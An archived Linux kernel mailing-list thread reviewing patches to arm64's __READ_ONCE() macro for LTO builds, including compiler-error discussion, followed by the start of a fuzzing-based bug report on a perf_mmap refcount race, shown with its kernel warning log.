arch/arm64/include/asm/rwonce.h | 10 +++++++--- 1 file changed, 7 insertions(+), 3 deletions(-) diff --git a/arch/arm64/include/asm/rwonce.h b/arch/arm64/include/asm/rwonce.h index 42c9e8429274..b7de74d4bf07 100644 --- a/arch/arm64/include/asm/rwonce.h +++ b/arch/arm64/include/asm/rwonce.h @@ -45,8 +45,12 @@ */ #define __READ_ONCE(x) \ ({ \ - typeof(&(x)) __x = &(x); \ - union { __rwonce_typeof_unqual(*__x) __val; char __c[1]; } __u; \ + auto __x = &(x); \ + auto __ret = (__rwonce_typeof_unqual(*__x) *)__x; \ + /* Hides alias reassignment from Clang's -Wthread-safety. */ \ + auto __retp = &__ret; \ + union { typeof(*__ret) __val; char __c[1]; } __u; \ + *__retp = &__u.__val; \ switch (sizeof(x)) { \ case 1: \ asm volatile(__LOAD_RCPC(b, %w0, %1) \ @@ -71,7 +75,7 @@ default: \ __u.__val = *(volatile typeof(*__x) *)__x; \ } \ - __u.__val; \ + *__ret; \ }) #endif /* !BUILD_VDSO */ -- 2.53.0.rc1.225.gd81095ad13-goog
{ "author": "Marco Elver <elver@google.com>", "date": "Fri, 30 Jan 2026 14:28:26 +0100", "thread_id": "20260130132951.2714396-1-elver@google.com.mbox.gz" }
lkml
[PATCH v3 0/3] arm64: Fixes for __READ_ONCE() with CONFIG_LTO=y
While investigating a Clang Context Analysis [1] false positive [2], I started to dig deeper into arm64's __READ_ONCE() implementation with LTO. That rabbit hole led me to find one critical bug with the current implementation (patch 1), and subtle improvements that then enabled me to fix the original false positive. Patch 1 fixes a bug where READ_ONCE() on types larger than 8 bytes (non-atomic fallback) incorrectly qualified the pointer rather than the pointee as volatile. This resulted in a lack of "once" semantics for large struct loads. Patch 2 refactors the macro to use __rwonce_typeof_unqual() and eliminates the ternary conditional. Building on the refactor, patch 3 fixes the context analysis false positive, by helping its alias analysis "see through" the __READ_ONCE despite the inline asm. ## Note on Alternative for Patch 3 An alternative considered for the Context Analysis fix was introducing a helper function to redirect the pointer alias; specifically passing a pointer to const-pointer does not invalidate an alias either (casting away the const is a deliberate escape hatch, albeit somewhat unusual looking). This approach was slightly more verbose, so the simpler approach was chosen for now. It is preserved here for future reference in case we need it for something else: static __always_inline void __set_pointer_opaque(void *const *dst, const void *val) { *(void **)dst = (void *)val; } ... __set_pointer_opaque((void *const *)&__ret, &__u.__val); ... [1] https://docs.kernel.org/next/dev-tools/context-analysis.html [2] https://lore.kernel.org/all/202601221040.TeM0ihff-lkp@intel.com/ --- v3: * Comments-smithing. * Use 'typeof(*__ret) __val' v2: * Add __rwonce_typeof_unqual() as fallback for old compilers. Marco Elver (3): arm64: Fix non-atomic __READ_ONCE() with CONFIG_LTO=y arm64: Optimize __READ_ONCE() with CONFIG_LTO=y arm64, compiler-context-analysis: Permit alias analysis through __READ_ONCE() with CONFIG_LTO=y arch/arm64/include/asm/rwonce.h | 27 ++++++++++++++++++++++----- 1 file changed, 22 insertions(+), 5 deletions(-) -- 2.53.0.rc1.225.gd81095ad13-goog
On Fri, 30 Jan 2026 14:28:24 +0100 Marco Elver <elver@google.com> wrote: I found this in some testing (on godbolt), so: Tested-by: David Laight <david.laight.linux@gmail.com>
{ "author": "David Laight <david.laight.linux@gmail.com>", "date": "Fri, 30 Jan 2026 15:06:58 +0000", "thread_id": "20260130132951.2714396-1-elver@google.com.mbox.gz" }
lkml
[PATCH v3 0/3] arm64: Fixes for __READ_ONCE() with CONFIG_LTO=y
While investigating a Clang Context Analysis [1] false positive [2], I started to dig deeper into arm64's __READ_ONCE() implementation with LTO. That rabbit hole led me to find one critical bug with the current implementation (patch 1), and subtle improvements that then enabled me to fix the original false positive. Patch 1 fixes a bug where READ_ONCE() on types larger than 8 bytes (non-atomic fallback) incorrectly qualified the pointer rather than the pointee as volatile. This resulted in a lack of "once" semantics for large struct loads. Patch 2 refactors the macro to use __rwonce_typeof_unqual() and eliminates the ternary conditional. Building on the refactor, patch 3 fixes the context analysis false positive, by helping its alias analysis "see through" the __READ_ONCE despite the inline asm. ## Note on Alternative for Patch 3 An alternative considered for the Context Analysis fix was introducing a helper function to redirect the pointer alias; specifically passing a pointer to const-pointer does not invalidate an alias either (casting away the const is a deliberate escape hatch, albeit somewhat unusual looking). This approach was slightly more verbose, so the simpler approach was chosen for now. It is preserved here for future reference in case we need it for something else: static __always_inline void __set_pointer_opaque(void *const *dst, const void *val) { *(void **)dst = (void *)val; } ... __set_pointer_opaque((void *const *)&__ret, &__u.__val); ... [1] https://docs.kernel.org/next/dev-tools/context-analysis.html [2] https://lore.kernel.org/all/202601221040.TeM0ihff-lkp@intel.com/ --- v3: * Comments-smithing. * Use 'typeof(*__ret) __val' v2: * Add __rwonce_typeof_unqual() as fallback for old compilers. Marco Elver (3): arm64: Fix non-atomic __READ_ONCE() with CONFIG_LTO=y arm64: Optimize __READ_ONCE() with CONFIG_LTO=y arm64, compiler-context-analysis: Permit alias analysis through __READ_ONCE() with CONFIG_LTO=y arch/arm64/include/asm/rwonce.h | 27 ++++++++++++++++++++++----- 1 file changed, 22 insertions(+), 5 deletions(-) -- 2.53.0.rc1.225.gd81095ad13-goog
On Fri, 30 Jan 2026 14:28:25 +0100 Marco Elver <elver@google.com> wrote: Having most of the comment in the commit message and a short one in the code look good. I think it will also fix a 'bleat' from min() about a signed v unsigned compare. The ?: causes 'u8' to be promoted to 'int' with the expected outcome. Reviewed-by: David Laight <david.laight.linux>@gmail.com
{ "author": "David Laight <david.laight.linux@gmail.com>", "date": "Fri, 30 Jan 2026 15:11:30 +0000", "thread_id": "20260130132951.2714396-1-elver@google.com.mbox.gz" }
lkml
[PATCH v3 0/3] arm64: Fixes for __READ_ONCE() with CONFIG_LTO=y
While investigating a Clang Context Analysis [1] false positive [2], I started to dig deeper into arm64's __READ_ONCE() implementation with LTO. That rabbit hole led me to find one critical bug with the current implementation (patch 1), and subtle improvements that then enabled me to fix the original false positive. Patch 1 fixes a bug where READ_ONCE() on types larger than 8 bytes (non-atomic fallback) incorrectly qualified the pointer rather than the pointee as volatile. This resulted in a lack of "once" semantics for large struct loads. Patch 2 refactors the macro to use __rwonce_typeof_unqual() and eliminates the ternary conditional. Building on the refactor, patch 3 fixes the context analysis false positive, by helping its alias analysis "see through" the __READ_ONCE despite the inline asm. ## Note on Alternative for Patch 3 An alternative considered for the Context Analysis fix was introducing a helper function to redirect the pointer alias; specifically passing a pointer to const-pointer does not invalidate an alias either (casting away the const is a deliberate escape hatch, albeit somewhat unusual looking). This approach was slightly more verbose, so the simpler approach was chosen for now. It is preserved here for future reference in case we need it for something else: static __always_inline void __set_pointer_opaque(void *const *dst, const void *val) { *(void **)dst = (void *)val; } ... __set_pointer_opaque((void *const *)&__ret, &__u.__val); ... [1] https://docs.kernel.org/next/dev-tools/context-analysis.html [2] https://lore.kernel.org/all/202601221040.TeM0ihff-lkp@intel.com/ --- v3: * Comments-smithing. * Use 'typeof(*__ret) __val' v2: * Add __rwonce_typeof_unqual() as fallback for old compilers. Marco Elver (3): arm64: Fix non-atomic __READ_ONCE() with CONFIG_LTO=y arm64: Optimize __READ_ONCE() with CONFIG_LTO=y arm64, compiler-context-analysis: Permit alias analysis through __READ_ONCE() with CONFIG_LTO=y arch/arm64/include/asm/rwonce.h | 27 ++++++++++++++++++++++----- 1 file changed, 22 insertions(+), 5 deletions(-) -- 2.53.0.rc1.225.gd81095ad13-goog
On Fri, 30 Jan 2026 14:28:26 +0100 Marco Elver <elver@google.com> wrote: LGTM (for an obscure definition of G). Reviewed-by: David Laight <david.laight.linux@gmail.com>
{ "author": "David Laight <david.laight.linux@gmail.com>", "date": "Fri, 30 Jan 2026 15:13:34 +0000", "thread_id": "20260130132951.2714396-1-elver@google.com.mbox.gz" }
lkml
[PATCH v3 0/3] arm64: Fixes for __READ_ONCE() with CONFIG_LTO=y
While investigating a Clang Context Analysis [1] false positive [2], I started to dig deeper into arm64's __READ_ONCE() implementation with LTO. That rabbit hole led me to find one critical bug with the current implementation (patch 1), and subtle improvements that then enabled me to fix the original false positive. Patch 1 fixes a bug where READ_ONCE() on types larger than 8 bytes (non-atomic fallback) incorrectly qualified the pointer rather than the pointee as volatile. This resulted in a lack of "once" semantics for large struct loads. Patch 2 refactors the macro to use __rwonce_typeof_unqual() and eliminates the ternary conditional. Building on the refactor, patch 3 fixes the context analysis false positive, by helping its alias analysis "see through" the __READ_ONCE despite the inline asm. ## Note on Alternative for Patch 3 An alternative considered for the Context Analysis fix was introducing a helper function to redirect the pointer alias; specifically passing a pointer to const-pointer does not invalidate an alias either (casting away the const is a deliberate escape hatch, albeit somewhat unusual looking). This approach was slightly more verbose, so the simpler approach was chosen for now. It is preserved here for future reference in case we need it for something else: static __always_inline void __set_pointer_opaque(void *const *dst, const void *val) { *(void **)dst = (void *)val; } ... __set_pointer_opaque((void *const *)&__ret, &__u.__val); ... [1] https://docs.kernel.org/next/dev-tools/context-analysis.html [2] https://lore.kernel.org/all/202601221040.TeM0ihff-lkp@intel.com/ --- v3: * Comments-smithing. * Use 'typeof(*__ret) __val' v2: * Add __rwonce_typeof_unqual() as fallback for old compilers. Marco Elver (3): arm64: Fix non-atomic __READ_ONCE() with CONFIG_LTO=y arm64: Optimize __READ_ONCE() with CONFIG_LTO=y arm64, compiler-context-analysis: Permit alias analysis through __READ_ONCE() with CONFIG_LTO=y arch/arm64/include/asm/rwonce.h | 27 ++++++++++++++++++++++----- 1 file changed, 22 insertions(+), 5 deletions(-) -- 2.53.0.rc1.225.gd81095ad13-goog
On Fri, Jan 30, 2026 at 02:28:25PM +0100, Marco Elver wrote: I know that CONFIG_LTO practically depends on Clang, but it's a bit grotty relying on that assumption here. Ideally, it would be straightforward to enable the strong READ_ONCE() semantics on arm64 regardless of the compiler. Since we're not providing acquire semantics for the non-atomic case, what we really want is the generic definition of __READ_ONCE() from include/asm-generic/rwonce.h here. The header inclusion mess prevents that, but why can't we just inline that definition here for the 'default' case? If TYPEOF_UNQUAL() leads to better codegen, shouldn't we use that to implement __unqual_scalar_typeof() when it is available? I fear I'm missing something here, but it just feels like we're optimising a pretty niche case (arm64 + LTO + non-atomic __READ_ONCE()) in a way that looks more generally applicable. Will
{ "author": "Will Deacon <will@kernel.org>", "date": "Mon, 2 Feb 2026 15:36:40 +0000", "thread_id": "20260130132951.2714396-1-elver@google.com.mbox.gz" }
lkml
[PATCH v3 0/3] arm64: Fixes for __READ_ONCE() with CONFIG_LTO=y
While investigating a Clang Context Analysis [1] false positive [2], I started to dig deeper into arm64's __READ_ONCE() implementation with LTO. That rabbit hole led me to find one critical bug with the current implementation (patch 1), and subtle improvements that then enabled me to fix the original false positive. Patch 1 fixes a bug where READ_ONCE() on types larger than 8 bytes (non-atomic fallback) incorrectly qualified the pointer rather than the pointee as volatile. This resulted in a lack of "once" semantics for large struct loads. Patch 2 refactors the macro to use __rwonce_typeof_unqual() and eliminates the ternary conditional. Building on the refactor, patch 3 fixes the context analysis false positive, by helping its alias analysis "see through" the __READ_ONCE despite the inline asm. ## Note on Alternative for Patch 3 An alternative considered for the Context Analysis fix was introducing a helper function to redirect the pointer alias; specifically passing a pointer to const-pointer does not invalidate an alias either (casting away the const is a deliberate escape hatch, albeit somewhat unusual looking). This approach was slightly more verbose, so the simpler approach was chosen for now. It is preserved here for future reference in case we need it for something else: static __always_inline void __set_pointer_opaque(void *const *dst, const void *val) { *(void **)dst = (void *)val; } ... __set_pointer_opaque((void *const *)&__ret, &__u.__val); ... [1] https://docs.kernel.org/next/dev-tools/context-analysis.html [2] https://lore.kernel.org/all/202601221040.TeM0ihff-lkp@intel.com/ --- v3: * Comments-smithing. * Use 'typeof(*__ret) __val' v2: * Add __rwonce_typeof_unqual() as fallback for old compilers. Marco Elver (3): arm64: Fix non-atomic __READ_ONCE() with CONFIG_LTO=y arm64: Optimize __READ_ONCE() with CONFIG_LTO=y arm64, compiler-context-analysis: Permit alias analysis through __READ_ONCE() with CONFIG_LTO=y arch/arm64/include/asm/rwonce.h | 27 ++++++++++++++++++++++----- 1 file changed, 22 insertions(+), 5 deletions(-) -- 2.53.0.rc1.225.gd81095ad13-goog
On Fri, Jan 30, 2026 at 02:28:26PM +0100, Marco Elver wrote: What does GCC do with this? :/ Will
{ "author": "Will Deacon <will@kernel.org>", "date": "Mon, 2 Feb 2026 15:39:36 +0000", "thread_id": "20260130132951.2714396-1-elver@google.com.mbox.gz" }
lkml
[PATCH v3 0/3] arm64: Fixes for __READ_ONCE() with CONFIG_LTO=y
While investigating a Clang Context Analysis [1] false positive [2], I started to dig deeper into arm64's __READ_ONCE() implementation with LTO. That rabbit hole led me to find one critical bug with the current implementation (patch 1), and subtle improvements that then enabled me to fix the original false positive. Patch 1 fixes a bug where READ_ONCE() on types larger than 8 bytes (non-atomic fallback) incorrectly qualified the pointer rather than the pointee as volatile. This resulted in a lack of "once" semantics for large struct loads. Patch 2 refactors the macro to use __rwonce_typeof_unqual() and eliminates the ternary conditional. Building on the refactor, patch 3 fixes the context analysis false positive, by helping its alias analysis "see through" the __READ_ONCE despite the inline asm. ## Note on Alternative for Patch 3 An alternative considered for the Context Analysis fix was introducing a helper function to redirect the pointer alias; specifically passing a pointer to const-pointer does not invalidate an alias either (casting away the const is a deliberate escape hatch, albeit somewhat unusual looking). This approach was slightly more verbose, so the simpler approach was chosen for now. It is preserved here for future reference in case we need it for something else: static __always_inline void __set_pointer_opaque(void *const *dst, const void *val) { *(void **)dst = (void *)val; } ... __set_pointer_opaque((void *const *)&__ret, &__u.__val); ... [1] https://docs.kernel.org/next/dev-tools/context-analysis.html [2] https://lore.kernel.org/all/202601221040.TeM0ihff-lkp@intel.com/ --- v3: * Comments-smithing. * Use 'typeof(*__ret) __val' v2: * Add __rwonce_typeof_unqual() as fallback for old compilers. Marco Elver (3): arm64: Fix non-atomic __READ_ONCE() with CONFIG_LTO=y arm64: Optimize __READ_ONCE() with CONFIG_LTO=y arm64, compiler-context-analysis: Permit alias analysis through __READ_ONCE() with CONFIG_LTO=y arch/arm64/include/asm/rwonce.h | 27 ++++++++++++++++++++++----- 1 file changed, 22 insertions(+), 5 deletions(-) -- 2.53.0.rc1.225.gd81095ad13-goog
On Mon, Feb 02, 2026 at 03:36:40PM +0000, Will Deacon wrote: We are? --- commit fd69b2f7d5f4e1d89cea4cdfa6f15e7fa53d8358 Author: Peter Zijlstra <peterz@infradead.org> Date: Fri Jan 16 19:18:16 2026 +0100 compiler: Use __typeof_unqual__() for __unqual_scalar_typeof() The recent changes to get_unaligned() resulted in a new sparse warning: net/rds/ib_cm.c:96:35: sparse: sparse: incorrect type in argument 1 (different modifiers) @@ expected void * @@ got restricted __be64 const * @@ net/rds/ib_cm.c:96:35: sparse: expected void * net/rds/ib_cm.c:96:35: sparse: got restricted __be64 const * The updated get_unaligned_t() uses __unqual_scalar_typeof() to get an unqualified type. This works correctly for the compilers, but fails for sparse when the data type is __be64 (or any other __beNN variant). On sparse runs (C=[12]) __beNN types are annotated with __attribute__((bitwise)). That annotation allows sparse to detect incompatible operations on __beNN variables, but it also prevents sparse from evaluating the _Generic() in __unqual_scalar_typeof() and map __beNN to a unqualified scalar type, so it ends up with the default, i.e. the original qualified type of a 'const __beNN' pointer. That then ends up as the first pointer argument to builtin_memcpy(), which obviously causes the above sparse warnings. The sparse git tree supports typeof_unqual() now, which allows to use it instead of the _Generic() based __unqual_scalar_typeof(). With that sparse correctly evaluates the unqualified type and keeps the __beNN logic intact. The downside is that this requires a top of tree sparse build and an old sparse version will emit a metric ton of incomprehensible error messages before it dies with a segfault. Therefore implement a sanity check which validates that the checker is available and capable of handling typeof_unqual(). Emit a warning if not so the user can take informed action. [ tglx: Move the evaluation of USE_TYPEOF_UNQUAL to compiler_types.h so it is set before use and implement the sanity checker ] Reported-by: kernel test robot <lkp@intel.com> Signed-off-by: Peter Zijlstra <peterz@infradead.org> Signed-off-by: Thomas Gleixner <tglx@kernel.org> Acked-by: Ian Rogers <irogers@google.com> Link: https://patch.msgid.link/87ecnp2zh3.ffs@tglx Closes: https://lore.kernel.org/oe-kbuild-all/202601150001.sKSN644a-lkp@intel.com/ diff --git a/Makefile b/Makefile index 9d38125263fb..179c9d9a56dd 100644 --- a/Makefile +++ b/Makefile @@ -1187,6 +1187,14 @@ CHECKFLAGS += $(if $(CONFIG_CPU_BIG_ENDIAN),-mbig-endian,-mlittle-endian) # the checker needs the correct machine size CHECKFLAGS += $(if $(CONFIG_64BIT),-m64,-m32) +# Validate the checker is available and functional +ifneq ($(KBUILD_CHECKSRC), 0) + ifneq ($(shell $(srctree)/scripts/checker-valid.sh $(CHECK) $(CHECKFLAGS)), 1) + $(warning C=$(KBUILD_CHECKSRC) specified, but $(CHECK) is not available or not up to date) + KBUILD_CHECKSRC = 0 + endif +endif + # Default kernel image to build when no specific target is given. # KBUILD_IMAGE may be overruled on the command line or # set in the environment diff --git a/include/linux/compiler.h b/include/linux/compiler.h index 04487c9bd751..c601222b495a 100644 --- a/include/linux/compiler.h +++ b/include/linux/compiler.h @@ -230,16 +230,6 @@ void ftrace_likely_update(struct ftrace_likely_data *f, int val, __BUILD_BUG_ON_ZERO_MSG(!__is_noncstr(p), \ "must be non-C-string (not NUL-terminated)") -/* - * Use __typeof_unqual__() when available. - * - * XXX: Remove test for __CHECKER__ once - * sparse learns about __typeof_unqual__(). - */ -#if CC_HAS_TYPEOF_UNQUAL && !defined(__CHECKER__) -# define USE_TYPEOF_UNQUAL 1 -#endif - /* * Define TYPEOF_UNQUAL() to use __typeof_unqual__() as typeof * operator when available, to return an unqualified type of the exp. diff --git a/include/linux/compiler_types.h b/include/linux/compiler_types.h index d3318a3c2577..377df1e64096 100644 --- a/include/linux/compiler_types.h +++ b/include/linux/compiler_types.h @@ -562,6 +562,14 @@ struct ftrace_likely_data { #define asm_inline asm #endif +#ifndef __ASSEMBLY__ +/* + * Use __typeof_unqual__() when available. + */ +#if CC_HAS_TYPEOF_UNQUAL || defined(__CHECKER__) +# define USE_TYPEOF_UNQUAL 1 +#endif + /* Are two types/vars the same type (ignoring qualifiers)? */ #define __same_type(a, b) __builtin_types_compatible_p(typeof(a), typeof(b)) @@ -569,6 +577,7 @@ struct ftrace_likely_data { * __unqual_scalar_typeof(x) - Declare an unqualified scalar type, leaving * non-scalar types unchanged. */ +#ifndef USE_TYPEOF_UNQUAL /* * Prefer C11 _Generic for better compile-times and simpler code. Note: 'char' * is not type-compatible with 'signed char', and we define a separate case. @@ -586,6 +595,10 @@ struct ftrace_likely_data { __scalar_type_to_expr_cases(long), \ __scalar_type_to_expr_cases(long long), \ default: (x))) +#else +#define __unqual_scalar_typeof(x) __typeof_unqual__(x) +#endif +#endif /* !__ASSEMBLY__ */ /* Is this type a native word size -- useful for atomic operations */ #define __native_word(t) \ diff --git a/scripts/checker-valid.sh b/scripts/checker-valid.sh new file mode 100755 index 000000000000..625a789ed1c8 --- /dev/null +++ b/scripts/checker-valid.sh @@ -0,0 +1,19 @@ +#!/bin/sh -eu +# SPDX-License-Identifier: GPL-2.0 + +[ ! -x "$(command -v "$1")" ] && exit 1 + +tmp_file=$(mktemp) +trap "rm -f $tmp_file" EXIT + +cat << EOF >$tmp_file +static inline int u(const int *q) +{ + __typeof_unqual__(*q) v = *q; + return v; +} +EOF + +# sparse happily exits with 0 on error so validate +# there is none on stderr. Use awk as grep is a pain with sh -e +$@ $tmp_file 2>&1 | awk -v c=1 '/error/{c=0}END{print c}'
{ "author": "Peter Zijlstra <peterz@infradead.org>", "date": "Mon, 2 Feb 2026 17:01:39 +0100", "thread_id": "20260130132951.2714396-1-elver@google.com.mbox.gz" }
lkml
[PATCH v3 0/3] arm64: Fixes for __READ_ONCE() with CONFIG_LTO=y
While investigating a Clang Context Analysis [1] false positive [2], I started to dig deeper into arm64's __READ_ONCE() implementation with LTO. That rabbit hole led me to find one critical bug with the current implementation (patch 1), and subtle improvements that then enabled me to fix the original false positive. Patch 1 fixes a bug where READ_ONCE() on types larger than 8 bytes (non-atomic fallback) incorrectly qualified the pointer rather than the pointee as volatile. This resulted in a lack of "once" semantics for large struct loads. Patch 2 refactors the macro to use __rwonce_typeof_unqual() and eliminates the ternary conditional. Building on the refactor, patch 3 fixes the context analysis false positive, by helping its alias analysis "see through" the __READ_ONCE despite the inline asm. ## Note on Alternative for Patch 3 An alternative considered for the Context Analysis fix was introducing a helper function to redirect the pointer alias; specifically passing a pointer to const-pointer does not invalidate an alias either (casting away the const is a deliberate escape hatch, albeit somewhat unusual looking). This approach was slightly more verbose, so the simpler approach was chosen for now. It is preserved here for future reference in case we need it for something else: static __always_inline void __set_pointer_opaque(void *const *dst, const void *val) { *(void **)dst = (void *)val; } ... __set_pointer_opaque((void *const *)&__ret, &__u.__val); ... [1] https://docs.kernel.org/next/dev-tools/context-analysis.html [2] https://lore.kernel.org/all/202601221040.TeM0ihff-lkp@intel.com/ --- v3: * Comments-smithing. * Use 'typeof(*__ret) __val' v2: * Add __rwonce_typeof_unqual() as fallback for old compilers. Marco Elver (3): arm64: Fix non-atomic __READ_ONCE() with CONFIG_LTO=y arm64: Optimize __READ_ONCE() with CONFIG_LTO=y arm64, compiler-context-analysis: Permit alias analysis through __READ_ONCE() with CONFIG_LTO=y arch/arm64/include/asm/rwonce.h | 27 ++++++++++++++++++++++----- 1 file changed, 22 insertions(+), 5 deletions(-) -- 2.53.0.rc1.225.gd81095ad13-goog
On Mon, Feb 02, 2026 at 05:01:39PM +0100, Peter Zijlstra wrote: Great! Then I don't grok why we need to choose between __unqual_scalar_typeof() and __typeof_unqual__() in the arch code. We should just use the former and it will DTRT. Will
{ "author": "Will Deacon <will@kernel.org>", "date": "Mon, 2 Feb 2026 16:05:38 +0000", "thread_id": "20260130132951.2714396-1-elver@google.com.mbox.gz" }
lkml
[PATCH v3 0/3] arm64: Fixes for __READ_ONCE() with CONFIG_LTO=y
While investigating a Clang Context Analysis [1] false positive [2], I started to dig deeper into arm64's __READ_ONCE() implementation with LTO. That rabbit hole led me to find one critical bug with the current implementation (patch 1), and subtle improvements that then enabled me to fix the original false positive. Patch 1 fixes a bug where READ_ONCE() on types larger than 8 bytes (non-atomic fallback) incorrectly qualified the pointer rather than the pointee as volatile. This resulted in a lack of "once" semantics for large struct loads. Patch 2 refactors the macro to use __rwonce_typeof_unqual() and eliminates the ternary conditional. Building on the refactor, patch 3 fixes the context analysis false positive, by helping its alias analysis "see through" the __READ_ONCE despite the inline asm. ## Note on Alternative for Patch 3 An alternative considered for the Context Analysis fix was introducing a helper function to redirect the pointer alias; specifically passing a pointer to const-pointer does not invalidate an alias either (casting away the const is a deliberate escape hatch, albeit somewhat unusual looking). This approach was slightly more verbose, so the simpler approach was chosen for now. It is preserved here for future reference in case we need it for something else: static __always_inline void __set_pointer_opaque(void *const *dst, const void *val) { *(void **)dst = (void *)val; } ... __set_pointer_opaque((void *const *)&__ret, &__u.__val); ... [1] https://docs.kernel.org/next/dev-tools/context-analysis.html [2] https://lore.kernel.org/all/202601221040.TeM0ihff-lkp@intel.com/ --- v3: * Comments-smithing. * Use 'typeof(*__ret) __val' v2: * Add __rwonce_typeof_unqual() as fallback for old compilers. Marco Elver (3): arm64: Fix non-atomic __READ_ONCE() with CONFIG_LTO=y arm64: Optimize __READ_ONCE() with CONFIG_LTO=y arm64, compiler-context-analysis: Permit alias analysis through __READ_ONCE() with CONFIG_LTO=y arch/arm64/include/asm/rwonce.h | 27 ++++++++++++++++++++++----- 1 file changed, 22 insertions(+), 5 deletions(-) -- 2.53.0.rc1.225.gd81095ad13-goog
On Mon, Feb 02, 2026 at 03:36:40PM +0000, Will Deacon wrote: Does it matter for GCC versions that do not support LTO? Because I'm quite sure that if, one day, we add support for GCC LTO, that GCC version will be new enough that it'll just take the __typeof_unqual__() version and it'll "just work". The problem with older GCC versions was that their __auto_type did not actually strip qualifiers (which it should have) -- this was fixed at some point. On Mon, Feb 02, 2026 at 04:05PM +0000, Will Deacon wrote: The old __unqual_scalar_typeof() is still broken where __typeof_unqual__() is unavailable - for the arm64 + LTO case that'd be Clang <= 18, which we still have to support. We could probably just ignore the performance issue ('volatile' reload from stack, rare enough though given volatile variables are not usually allowed) for these older versions and just say "use the newer compiler to get better perf", but the 'const' issue will break the build: | --- a/arch/arm64/include/asm/rwonce.h | +++ b/arch/arm64/include/asm/rwonce.h | @@ -46,7 +46,7 @@ | #define __READ_ONCE(x) \ | ({ \ | auto __x = &(x); \ | - auto __ret = (__rwonce_typeof_unqual(*__x) *)__x; \ | + auto __ret = (__unqual_scalar_typeof(*__x) *)__x; \ | /* Hides alias reassignment from Clang's -Wthread-safety. */ \ | auto __retp = &__ret; \ | union { typeof(*__ret) __val; char __c[1]; } __u; \ Results in: | In file included from arch/arm64/kernel/asm-offsets.c:11: | In file included from ./include/linux/arm_sdei.h:8: | In file included from ./include/acpi/ghes.h:5: | In file included from ./include/acpi/apei.h:9: | In file included from ./include/linux/acpi.h:15: | In file included from ./include/linux/device.h:32: | In file included from ./include/linux/device/driver.h:21: | In file included from ./include/linux/module.h:20: | In file included from ./include/linux/elf.h:6: | In file included from ./arch/arm64/include/asm/elf.h:141: | ./include/linux/fs.h:1344:9: error: cannot assign to non-static data member '__val' with const-qualified type 'typeof (*__ret)' (aka 'struct fown_struct *const') | 1344 | return READ_ONCE(file->f_owner); | | ^~~~~~~~~~~~~~~~~~~~~~~~ | ./include/asm-generic/rwonce.h:50:2: note: expanded from macro 'READ_ONCE' | 50 | __READ_ONCE(x); \ | | ^~~~~~~~~~~~~~ | ./arch/arm64/include/asm/rwonce.h:76:13: note: expanded from macro '__READ_ONCE' | 76 | __u.__val = *(volatile typeof(*__x) *)__x; \ | | ~~~~~~~~~ ^ | ./include/linux/fs.h:1344:9: note: non-static data member '__val' declared const here | 1344 | return READ_ONCE(file->f_owner); | | ^~~~~~~~~~~~~~~~~~~~~~~~ | ./include/asm-generic/rwonce.h:50:2: note: expanded from macro 'READ_ONCE' | 50 | __READ_ONCE(x); \ | | ^~~~~~~~~~~~~~ | ./arch/arm64/include/asm/rwonce.h:52:25: note: expanded from macro '__READ_ONCE' | 52 | union { typeof(*__ret) __val; char __c[1]; } __u; \ | | ~~~~~~~~~~~~~~~^~~~~ ... and many many more such errors. It's an unfortunate mess today, but I hope sooner than later we bump the minimum compiler versions that we can just unconditionally use __typeof_unqual__() and delete __unqual_scalar_typeof(), __rwonce_typeof_unqual() workaround and all the other code that appears to be conditional on USE_TYPEOF_UNQUAL: % git grep USE_TYPEOF_UNQUAL arch/x86/include/asm/percpu.h:#if defined(CONFIG_USE_X86_SEG_SUPPORT) && defined(USE_TYPEOF_UNQUAL)
{ "author": "Marco Elver <elver@google.com>", "date": "Mon, 2 Feb 2026 18:48:47 +0100", "thread_id": "20260130132951.2714396-1-elver@google.com.mbox.gz" }
lkml
[PATCH] perf/core: Fix refcount bug and potential UAF in perf_mmap
Hello, I would like to report a reference counting vulnerability in the Linux kernel perf_event subsystem, which I discovered using a modified syzkaller-based kernel fuzzing tool that I developed. Summary ------- A local user can trigger a reference count saturation or a use-after-free (UAF) vulnerability in the perf_mmap function. This is caused by a race condition where a ring_buffer object's reference count is incremented after it has already reached zero. The vulnerability exists in the perf_mmap() function in kernel/events/core.c. While the function uses mmap_mutex to protect the initial buffer setup, it performs subsequent operations (such as map_range) on event->rb outside of the locked scope. If the event is closed or the buffer is detached concurrently, the reference count of the ring_buffer can drop to zero, leading to an 'addition on 0' warning or a UAF when the kernel attempts to access or increment it later. I verified this on Linux kernel version 6.18.5. Environment ----------- - Kernel version: 6.18.5 (the complete config is attached) - Architecture: x86_64 - Hypervisor: QEMU (Standard PC i440FX + PIIX, BIOS 1.13.0-1ubuntu1.1) Symptoms and logs ----------------- The kernel triggers a 'refcount_t: addition on 0; use-after-free' warning followed by a memory leak warning The full report is as below: audit: type=1400 audit(1769676568.351:202): avc: denied { open } for pid=21484 comm="syz.6.2386" scontext=system_u:system_r:kernel_t:s0 tcontext=system_u:system_r:kernel_t:s0 tclass=perf_event permissive=1 ------------[ cut here ]------------ refcount_t: addition on 0; use-after-free. WARNING: CPU: 3 PID: 21486 at lib/refcount.c:25 refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25 Modules linked in: CPU: 3 UID: 0 PID: 21486 Comm: syz.6.2386 Not tainted 6.18.5 #1 PREEMPT(voluntary) Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014 RIP: 0010:refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25 Code: f0 40 ff 80 3d 70 44 61 03 00 0f 85 52 ff ff ff e8 c9 f0 40 ff c6 05 5e 44 61 03 01 90 48 c7 c7 80 43 5c b8 e8 75 5d 0f ff 90 <0f> 0b 90 90 e9 2f ff ff ff e8 a6 f0 40 ff 80 3d 3d 44 61 03 00 0f RSP: 0018:ffff888103c17678 EFLAGS: 00010286 RAX: 0000000000000000 RBX: ffff888107641190 RCX: ffffffff8137110c RDX: 0000000000080000 RSI: ffffc90002279000 RDI: ffff88811b3a3e88 RBP: 0000000000000002 R08: fffffbfff7219644 R09: ffffed10236747d2 R10: ffffed10236747d1 R11: ffff88811b3a3e8b R12: 0000000000000000 R13: ffff888002255a10 R14: ffff888002255a00 R15: ffff888107641170 FS: 00007f7ef46f3640(0000) GS:ffff888160a03000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 0000200000000478 CR3: 000000010698c006 CR4: 0000000000770ff0 DR0: 0000000000000000 DR1: 00000200000000a2 DR2: 00000200000000a2 DR3: 00000200000000a2 DR6: 00000000ffff0ff0 DR7: 0000000000000600 PKRU: 80000000 Call Trace: <TASK> __refcount_add include/linux/refcount.h:289 [inline] 